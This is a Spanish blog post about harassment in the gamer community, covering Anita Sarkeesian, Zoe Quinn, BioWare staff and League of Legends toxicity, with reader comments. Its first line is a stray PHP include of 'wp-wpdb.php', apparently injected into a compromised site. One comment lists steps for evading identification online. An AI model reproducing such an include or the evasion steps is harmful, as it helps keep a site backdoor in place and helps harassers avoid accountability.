if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); ¿Qué está pasando en la comunidad gamer? – La Fortaleza de LeChuck

¿Qué está pasando en la comunidad gamer?

Desde hace un tiempo a esta parte estoy verdaderamente consternada al ver el odio que inunda la comunidad de jugadores. Parece que se ha vuelto algo habitual manifestar el desprecio extremo hacia personas que expresan su libre opinión sobre determinados temas en webs y canales de Youtube. Llevo mucho tiempo navegando (desde 1996 para ser precisos) pero desde la llegada de las redes sociales no había visto jamás semejantes índices de violencia ante diferentes puntos de vista sobre nuestro hobby. Parece que más que unir, las redes separan y toxifican el ambiente ante la pasividad de la gente que le resta importancia.

odio-comunidad-gamer

La comunidad gamer anda revuelta desde que Anita Sarkeesian aterrizó en Youtube dando su opinión sobre la situación de la mujer en los videojuegos, algo que hasta la fecha nadie se había atrevido a tocar de forma tan gráfica y directa. Como jugadora veterana, tengo que decir que me he sentido en ocasiones incómoda jugando a una gran cantidad de títulos donde los personajes femeninos tenían un papel bastante deplorable, y siempre resonaba en mi cabeza la pregunta ¿por qué pasa esto? Pero el mundo avanza y el paso del tiempo ha traído ideas frescas, aunque la evolución es lenta y aún hay mucho camino por recorrer hasta dejar de depender del protagonista blanco y heterosexual. Volviendo al trabajo de Anita, aunque no estoy de acuerdo en todo lo que dice —sobre todo en los ejemplos— si que creo que ofrece una visión general bastante acertada sobre estereotipos y machismo inapreciable para un gran número de personas y muy arraigado aún en la sociedad que vivimos. El primer video de la serie Damsel in Distress tuvo una repercusión tremenda en los medios, sin embargo, una multitud de usuarios la atacó con insultos injustificados hacia su persona, tanto en sus videos de Youtube como en los comentarios de los medios que se hacían eco. Desde entonces, los comentarios de su canal están cerrados y lo curioso es que muchos de estos acosadores la tachan de cobarde por ello. Los ataques han llegado hasta el Twitter de Sarkeesian, donde expanden su veneno de forma continua. La videoblogger americana no se ha dejado pisotear y ha seguido con sus diferentes series, y recientemente ha publicado la segunda parte de Women as Background Decoration, que ha conseguido que los medios y desarrolladoras reflexionen sobre ello. Os recomiendo especialmente el artículo de Tom Bramwell para Eurogamer.net titulado I am sexist.

Anita-Sarkeesian
Imaginaos que tres cuartas partes de los comentarios de vuestros videos fueran como estos.

Hace unos días llegó la gota que colmó el vaso, un individuo amenazó de muerte a Anita y su familia por Twitter, la cual denunció los hechos ante la policía. Y todo esto por tan solo crear unos videos donde expone su punto de vista sobre el papel de la mujer en los videojuegos. Inaudito. Puedes estar de acuerdo o no, incluso puedes dirigirle tu opinión vía Twitter y rebatir sus argumentos, pero la tendencia general es ver el video y lanzar un odio inexplicable hacia su persona, como si alguien atara a estos individuos a una silla de pies y manos, con un artilugio en los ojos para no cerrarlos, para que lo vieran en contra de su voluntad. Muchos acosadores alegan en su defensa que es porque Anita quiere destruir el mundo del videojuego, y el papel de éstos es el de protectores para preservarlo, sin cambios. Otros se escudan en que es ficción, y que una mejor posición de la mujer en los videojuegos supondría una discriminación hacia el hombre. En serio, ¿en que mundo vivimos?

Esta violencia injustificada no solo afecta a periodistas y bloggers, fue muy sonado el caso de Zoe Quinn, una desarrolladora indie que publicó su juego Depression Quest en Steam Greenlight y una horda de trolls la estuvo acosando por diferentes medios, e incluso telefónicamente. Fue tal la violencia verbal, que se vio obligada a retirar el juego de la plataforma. ¿Y qué fue lo que hizo esta «desalmada»? Publicar un juego que busca concienciar sobre la depresión. Finalmente fue publicado en Steam.

zoe-quinn

Creo que no es descabellado utilizar la palabra terrorismo sobre la actividad que desenpeñan estos sujetos, que escondidos detrás de un ordenador, propagan su odio y aplastan a sus objetivos por el mero hecho de no gustarles lo que hacen. Miembros de importantes compañías de videojuegos también han sufrido amenazas. Seguro que recordaréis el revuelo por los finales de Mass Effect 3, donde la gente no se limitó a quejarse, sino que descargó toda su ira sobre Casey Hudson, ya que no era el final que él prometió. Sin embargo, el caso más grave fue hacia la guionista de Dragon Age 2, Jennifer Hepler, quien abandonó BioWare después de que un lunático descontento con el juego amenazara de muerte a su familia e hijo.

Pero esto no acabaría aquí, podríamos hablar del odio hacia el simple jugador por las redes sociales, o en foros, donde criticar ciertos juegos o compañías intocables viene acompañado de un insulto por parte de un fan acérrimo. Da la sensación que los moderadores parecen más preocupados en eliminar el spam de las firmas que de acabar con la gente problemática. Por esta razón ya no transito muchos foros, pero a veces me llegan noticias de follones varios, como el que vivió una amiga en sus propias carnes. Abrió un tema en varios foros españoles bastante populares para buscar jugadoras, con la idea de crear un equipo femenino para competir en un futuro. Algo tan simple degeneró a insultos hacia su persona, off topics y tonterías varias.

Para acabar con el tema del odio, quería hablar de uno que recibimos todos aquellos quienes jugamos a juegos multijugador. Una de las comunidades más polémicas es la del free to play League of Legends, donde pululan un gran número de jugadores tóxicos que sueltan todo tipo de improperios por los motivos más surrealistas que os podáis imaginar. Esto provoca que muchos jugadores, tanto veteranos como nuevos, abandonen el juego. La semana pasada estuve jugando con una amiga que hace poco desembarcó en este juego y pudo vivir en directo las amenazas y el nocivo comportamiento de muchos usuarios. La negativa actitud de los jugadores en el multijugador se vuelve más perturbadora cuando tu nombre y/o avatar es femenino. Las compañías están tomando cartas en el asunto con penalizaciones hacia estos jugadores pero ¿realmente servirá de algo? ¿Se puede controlar de forma eficaz?

lol-2
Esto es lo más bonito que te dirán

¿Qué provoca todo este odio que abunda en nuestra comunidad? Pues que haya gente que no pueda soportarlo y desaparezca. Otros tengan que cerrar los comentarios de una web o canal, desbordado por los comentarios de seres sin alma. Todo esto parece un reflejo de un mundo cada vez mas deshumanizado, donde la educación y los valores brillan por su ausencia, y donde las mentes perturbadas campan a sus anchas desde el anonimato.

La violencia ha llegado a cotas tan altas que diferentes miembros de la industria del videojuego han firmado un comunicado en contra del acoso:

Carta abierta a la comunidad de jugadores

Creemos que todo el mundo, no importa el género, orientación sexual, etnia o religión tiene el derecho de jugar a videojuegos, criticarlos y crear juegos sin ser acosados ​​o amenazados. Es la diversidad de nuestra comunidad la que permite que los videojuegos florezcan.
Si ves amenazas con violencia o buscando hacer daño en los comentarios de Steam, YouTube, Twitch, Twitter, Facebook o reddit, por favor tómate un momento para reportarlo en los respectivos sitios.
Si ves odio y acoso, toma partido en contra de ello para hacer de la comunidad gamer un espacio más agradable.

Gracias.

No formes parte de ello, no rías las gracias a las personas que intentan destrozar el trabajo y la ilusión de otros porque quizá algún día te puede tocar a ti y quizá entonces entiendas la importancia de la palabra respeto.

Para terminar, espero que todas estas iniciativas hagan de nuestra comunidad algo mejor, y que jugadoras y jugadores de todas las edades disfruten juntos y puedan compartir opiniones, y así, solamente así, nuestra comunidad será respetada.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

13 comentarios

  1. La verdad es que estamos llegando a unos niveles dantescos. A ver seguramente siempre ha habido ese odio y locos siempre habrá, pero con internet y las redes sociales, se ven mas.

    Antes, como mucho uno podía despotricar e insultar en su web o foros. A lo sumo, enviar un email a esa personas. Pero hoy en día es tan fácil como ir a tweeter y decir la primera estupidez que se nos pase por la cabeza.

    El anonimato de la red hace que cualquiera se envalentone e insulte. Es mas si uno empieza, mas de uno se animara. Es como todo lo difícil es tirar la primera piedra, a partir de ahí viene la segunda, la tercera.

    Desde luego hay que condenar este tipo de conductas. Es como el caso de Zoe Quinn que comentas, fue insultada antes y después del escándalo.

    Primero por su juego y segundo por el «supuesto» escándalo que hubo. No se si al final fue cierto y no, pero la gente se cebo mas con que se acostó con varios periodistas que con el problema real.

    En lugar de criticar lo podrido que esta el periodismo del videojuego, pues realmente da igual que la señora Quinn comprara notas con favores sexuales, que con magdalenas o un paseo en barca, la gente la puso de zorra para arriba. A ver que esa señora se acueste con quiera y le de la gana.

    Pero no, los foros en lugar de criticar a ambas partes y denunciar las notas compradas, casi parecía que habían violado a los pobres periodistas.

    En definitiva, lo que hay que hacer es reportar y denunciar a esa panda de energúmenos. Si por ejemplo, Depression Quest nos parece un mal juego, se ha de criticar desde un punto de vista objetivo y respetuoso.

    Pero nunca y repito NUNCA amenazar ni insultar.

    1. Mediante las redes sociales es más directo llevar ese odio hacia la persona en cuestión, y es relativamente fácil investigar y encontrar hasta su domicilio, por eso las amenazas no hay que ignorarlas. El tema de Zoe, sea verdad o mentira lo de las supuestas notas compradas, no da derecho a sujetos a amenazarla. Supongo que aquello de la empatía cada vez se lleva menos.

      1. Ahí esta, parece que la gente no se da cuenta de lo que dice en redes sociales puede ser visto por cualquiera. Parecen sacar lo peor de cada uno.

        Como siempre, pasa la gente da un mal uso a una tecnología a priori parece buena.

        Y lo de Zoe, es lo que te comento. Si ha comprado las notas, entiendo que se denuncie a ella y los periodistas, que en este caso creo que ellos tienen mas culpa. Puedes reprobar esas conductas y quejarte pero no amenazar como un energúmeno.

        Es lógico que puedas decirle a Zoe, «Oye, mira no me parece correcto que compres las notas» o a los periodistas decirles «No tenéis ningún tipo de ética periodista ni credibilidad, a partir de ahora». Eso siempre que sea cierto, claro.

        Dejando de lado escabrosos temas sexuales, para mi estaría igual de feo que los hubiese comprado con tartas.

        Pero como dices, NADIE tiene derecho a insultar ni amenazar a nadie.

        Por desgracia esto cada día pasa en mas campos, no solo en los videojuegos. Aunque no se porque parece que últimamente ha habido una ola «hater» en el mundillo.

        Como dices antes se criticaban los juegos pero no se insultaba a los desarrolladores. Ahora parece que todos sabemos de todo y podemos insultarles en la cara.

        Y en cuanto la empatia,dejando que siempre habrá locos por ahí, cada vez hay menos. Estamos mas comunicados pero menos unidos. Parece que cada vez mas la gente nos creemos con derecho a insultar y no nos ponemos en lugar del otro.

        P.D:

        Enhorabuena por el articulo, ha sido de los pocos que he visto que denuncia todo esto. 😉

        1. Sí, totalmente de acuerdo en el tema Zoe, y bueno, sobre las notas en los medios ya sabemos como está la historia.
          Creo que la ola hater proviene de la moda de ser «troll», desde hace un par de años la gente ve como algo divertido el trolleo en youtube y en twitter, y la cosa se está yendo de madre. En lo demás, totalmente de acuerdo, y sabías palabras las de tu último párrafo. A ver si recuperamos la humanidad perdida. Gracias y un saludo 🙂

  2. Me ha parecido genial el artículo. El problema es que estos comportamientos no solo no van a parar, si no que van a ir a más conforme se vayan extendiendo los videojuegos.

    A título personal diré que, sin menospreciar los otros casos expuestos, me parece increíble que no sólo se critiqué de una forma tan agresiva si no que además, se intente obligar a un desarrollador a retirar o cambiar su producto. Mi principal preocupación es ¿hasta dónde vamos a llegar si el propio usuario ya restringe incluso la creatividad del desarrollador?

    1. Gracias. Pues habrá que regularlo de alguna forma, porque hay mucha toxicidad que hace mucho daño a todos los que conformamos la industria del videojuego.
      Si tu segundo párrafo es por los videos de Anita, no me parece que critique de forma agresiva, ella expone su visión y no he visto que en ningún caso falte el respeto. Para mí, sus videos invitan a la reflexión, y a partir de ahí cada uno saca sus propias conclusiones. Me parecen correctas las críticas constructivas, creo que ayudan a mejorar a las compañías y sus sagas. ¡Imagínate que después de un Dragon Age 2 nos hubiéramos callado y quedado conformes! Los tiempos han cambiado, la sociedad también y los juegos han de cambiar y evolucionar con esta.

  3. Bueno el problema no es de los videojuegos sino de internet, el cual garantiza nuestro anonimato, puedes ir a un video de youtube con una cuenta nueva y cagarte en… y NADIE sabra NUNCA quien eres, a menos que tomen tu ip etc.. que no lo haran por un comentario, en la vida real por ejemplo si vas a la casa de uno y le insultas lo mas probable es que acabes mal…

    Y en el caso de el Lol, lo asemejo con un partido de futbol, estas jugando con un equipo de desconocidos y son segun tu «muy malos» en el Lol les puedes decir cualquier cosa que lo unico que pasara es que se vallan afk o te digan «shut up, fuck you»

    Y ademas hay muchos niños de menos de 13 años jugando en los f4p, la comunidad de internet es una basura pero es lo que tiene el anonimato y que jamas veras cara a cara al que estas insultando

    1. En verdad si se puede ser anónimo al 100%, compras un ordenador en otro país, cambias la dirección MAC, te conectas en un wi-fi público de ese pais, vuelves a cambiar la dirección MAC, formateas ese ordenador y luego le pasas una herramienta para borrar los datos, le das unas cuantas pasadas, sacas el disco duro, lo destruyes, lo tiras en un contenedor y luego en otro el orenador (separado por kilómetros a poder ser) y vuelves a tu país. Así puedes cometer una acción como un insulto en google sin ser pillado jamás.

  4. La verdad es que cuando yo doy mi opinión expresando que las consolas (para mi) son peores y argumentando el por que, se me trata de idiota para arriba (y no entiendo por qué puesto que es una opinión argumentada, la cual es rebatible por otra opinión y sin insultar).
    El otro día demostré que por el precio de 430€ es posible hacer un ordenador a piezas (y sin busca piezas a buen precio, las primeras que había en PC Componentes) con un i3, una GTX 750 Ti y 8GB de RAM. Con esas piezas igualas e incluso superas (sobretodo en gráfica) la PlayStation 4 (y es algo que he comprobado haciendo esa build para un amigo y abriendo el Battlefield en Ultra a 60FPS estables).
    ¿Quieres un mando? Compras un mando para PC. ¿Quieres el mando de PS4, PS3, XBox 360 o XBone? Pues también lo peudes tener. ¿Quieres un volante? Pues también. ¿Quieres usar el PC para ver vídeos, hacer presentaciones en Powerpoint, escribir en Office, hacer cálculos, programar, o lo que quieras? También puedes.
    ¡¡¡En ordenador necesitas comprarte una pantalla!!! Y yo digo, en consola una tele 😉
    Di esa opinión, exactamente esa con esos argumentos, no me metó con NADIE, y no tardaron en llamarme idiota, copión de argumentos (que en realidad son los que hay, no se los copio a nadie), cabrón, puto defensor de PCs, niño rata, crio (por la foto), etc, etc, etc…

    ¿Qué queréis que os diga? Yo no me meto con nadie por que le guste la Play 4, si quieren jugar a Play 4 por sus exclusivos, o por sus no tan exclusivos por que simplemente les gusta más, pues adelante, yo no seré quien les impida jugar ni quien les llame idiotas por tener una opinión diferente.
    En resumen, hay gente muy tonta por el mundo llamando de todo por internet detrás de una pantalla por simples opiniones.
    Desafortunadamente no acabará, los trolls van en aumento.

  5. No puedo creer que haya gente asi… al menos espero creer que los que ataquen de esta forma a las desarrolladoras de videojuegos no sean tambien desarrolladores. La internet se ha venido realmente abajo si los hombres son tan machistas como para hacer eso.

  6. Pienso y siempre pensaré que Anita es una oportunista. Si realmente le molestara el sexismo, estaría combatiéndolo en la vida real, y no en un videojuego.

    Salvo el juego donde el objetivo -totalmente fantasioso- era violar mujeres y niñas (que ese sí me parece horrible), todos los demás, incluyendo el GTA, tienen de transfondo sexismo, violencia, entre muchas otras cosas de manera puramente representativa. Es un reflejo de la sociedad y una manera de ambientar los juegos con cierta temática. Pero no son los objetivos del juego en sí. Si queremos que estas cosas cambien, habrá que cambiar la propia sociedad y todos los ambientes perjudiciales existentes hoy en día, y borrar de la
    historia todo ese pasado. Y eso lo veo imposible.

    Nunca me voy a tomar una película o un videojuego en serio, simplemente miro de disfrutar y meterme en otro papel. Un papel que no tomaré en la vida real jamás. Aunque soy más de jugar a juegos antiguos y usar la imaginación, toco muy poco las novedades de ahora, ya que me gustan muy pocas.

    Sin embargo, tienes razón al decir que porque Anita piense lo que piensa y lo exprese, no es justo que se la amenaze de muerte entre otras barbaridades.

    El odio en internet da asco. He estado un mes entero agobiada y asqueada por ello porque se me está agotando la paciencia con los nidos de trolls de internet.
    Yo ya me he encontrado con mucha mierda este último año desde que tuvimos nuestro
    proyecto en kickstarter hasta el día de hoy. Y no sólo se echa mierda entre jugadores y desarrolladores, también los propios desarrolladores tiran mierda por detrás aunque de frente sea todo caras sonrientes y peloteo. A mí me han tirado mierda por mil razones, y como persona empática que soy, he llegado a soltar mierda de vuelta como si de un
    boomerang se tratara. Es algo casi incontrolable cuando llegas al límite de tu paciencia (depende de cómo lo lleve cada uno).

    Muy poca gente lo ha hecho porque sea mujer (los puedo contar con los dedos de una mano) y muchos otros porque son sensibles a muchas cosas. No sé si la gente busca la más mínima excusa para derrochar todo tipo de odio y comentarios ofensivos, pero es lo que parece. Se piensan que internet sirve para esto, para despotricar, desahogarse, expresarse de manera desagradable sin dar la cara… Porque eso es ir a lo fácil y a
    lo seguro.

    Lo difícil es analizar una situación y decir lo que piensas sin ser hostil y de manera constructiva. Pero todos hemos caido en eso alguna vez, lo que pasa es que algunos individuos se dedican a hacer eso continuamente y parece que no sepan hacer otra
    cosa.

    Sobre los que amenazan a muerte, si van en serio, son gente enferma. Siempre lo digo, que internet es una herramienta muy concurrida y accesible de la cual es muy fácil concentrar una cantidad de gente con los mismos intereses en varios puntos y en cuestión de
    segundos. Vamos, que internet está muy bien, pero como todo, tiene doble filo.

    1. Bueno, hay muchas formas de combatir el sexismo y otras desigualdades, yo creo que youtube puede llegar a todo el mundo y es un buen canal para ello. Desde siempre se han lanzado productos audiovisuales para concienciar a la gente y hacerla reflexionar sobre diversos temas, para mí este es otro más. Precisamente algunos desarrolladores de videojuegos reconocen que aunque hemos avanzado aún hay mucho camino que andar. Incluso gente como el creador de The Last of Us dijo que se inspiró en los videos de Anita para crear a Ellie.
      Yo no es que me tome las pelis o videojuegos en serio, pero cuando veo ciertas conductas y estereotipos que se repiten, llego a la conclusión de que algo no anda bien. Tampoco cuando veo los comentarios de usuarios en algún tema sobre feminismo/homosexualidad. Da miedo.

      Me alegro que no te hayas encontrado con pocos niveles de discriminación trabajando en el sector. Los trolls últimamente dominan internet alimentados por youtubers que incitan a ello o foros dispuestos a joder la vida a cualquier objetivo que se marquen. Es una lacra imparable, es mejor no entrar al trapo e intentar ignorarlo y denunciarlo. En serio que me dejas alucinada con lo que me cuentas de desarrolladoras echando mierda sobre otras, bastante trabajo cuesta destacar en el mundillo para que encima los de tu propio sector te hundan. Debería salir a la luz este tipo de trato para dejarles en evidencia.

      1. Entiendo tu punto de vista, pero sigo pensando que estos problemas sociales se tienen que combatir en la vida real para que todo lo demás vaya cambiando poco a poco. Anita es una oportunista, porque muchas veces busca las 5 patas al gato en muchas de sus argumentaciones. Sin embargo tiene derecho a dar su opinión sin que la acosen, como todo el mundo.

        Lo de los trolls, youtubers, y desarrolladores… No te asustes. Somos personas aquí, allá y en la china. Con eso quiero decir que las personas en muchos ambientes se pueden discutir, pelear, etc. Entra en nuestra naturaleza, supongo.
        Internet te permite eso sin dar la cara, por lo cual fomenta indirectamente a este tipo de actitudes «cobardes» y egolatras.

        Lo peor de lo que me comentas respecto a lo que hay detrás del telón entre algunos desarrolladores (porque no son todos, obviamente) es que si uno lo hace público, el que sale perdiendo es el que denuncia estas actitudes. Las cosas funcionan así, lamentablemente. Hay mucho troll, mucho fanboy, mucho «hater» (como suelen decir) y mucho tipo de personas que no ven las cosas objetivamente, y es por ello que los desarrolladores tendemos a mordernos la lengua todo lo que podemos de cara al público. Es como los camareros cuando aguantan a clientes maleducados e insoportables, que tienen que callar porque sino luego salen perdiendo ellos. Es una mierda.

        A mí ya me pasó que por decir cosas que pienso se me han tirado encima de muy mala manera una orda de fanboys y trolls. Yo tampoco soy una perla, pero es que este mundillo (por dentro) quema demasiado y terminas hasta las narices de mucha gente cuando llegas a un público más amplio.

Dejar un comentario